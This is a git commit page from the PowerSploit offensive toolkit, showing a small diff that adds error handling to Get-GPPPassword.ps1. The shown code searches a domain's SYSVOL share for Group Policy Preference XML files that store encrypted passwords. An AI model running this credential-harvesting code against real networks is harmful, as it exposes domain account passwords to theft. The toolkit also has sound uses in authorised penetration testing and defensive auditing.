diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2013-08-17 16:31:48 -0400 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2013-08-17 16:31:48 -0400 |
| commit | ba3361341307104450628b456d8b19ee047ef10e (patch) | |
| tree | 076d4b776b726bc86c1be6d4788819e7691b0c58 | |
| parent | 66face4488625ad5079311c68fc92d22f705b6d4 (diff) | |
| download | PowerSploit-ba3361341307104450628b456d8b19ee047ef10e.tar.gz PowerSploit-ba3361341307104450628b456d8b19ee047ef10e.zip | |
Added additional error handling to Get-GPPPassword
| -rw-r--r-- | Exfiltration/Get-GPPPassword.ps1 | 13 |
1 files changed, 10 insertions, 3 deletions
diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index c905f08..7dbd23d 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -61,12 +61,19 @@ } #ensure that machine is domain joined and script is running as a domain account - if (((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False) {throw 'Machine is not joined to a domain.'} - if (($Env:USERDNSDOMAIN) -eq $Null) {throw 'Account is not a domain account.'} + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) + { + throw 'Machine is not joined to a domain.' + } #discover potential files containing passwords ; not complaining in case of denied access to a directory - $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'groups.xml','services.xml','scheduledtasks.xml','datasources.xml' + $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml' + if ( -not $XMlFiles ) + { + throw 'No files containing encrypted passwords found.' + } + foreach ($File in $XMLFiles) { try { |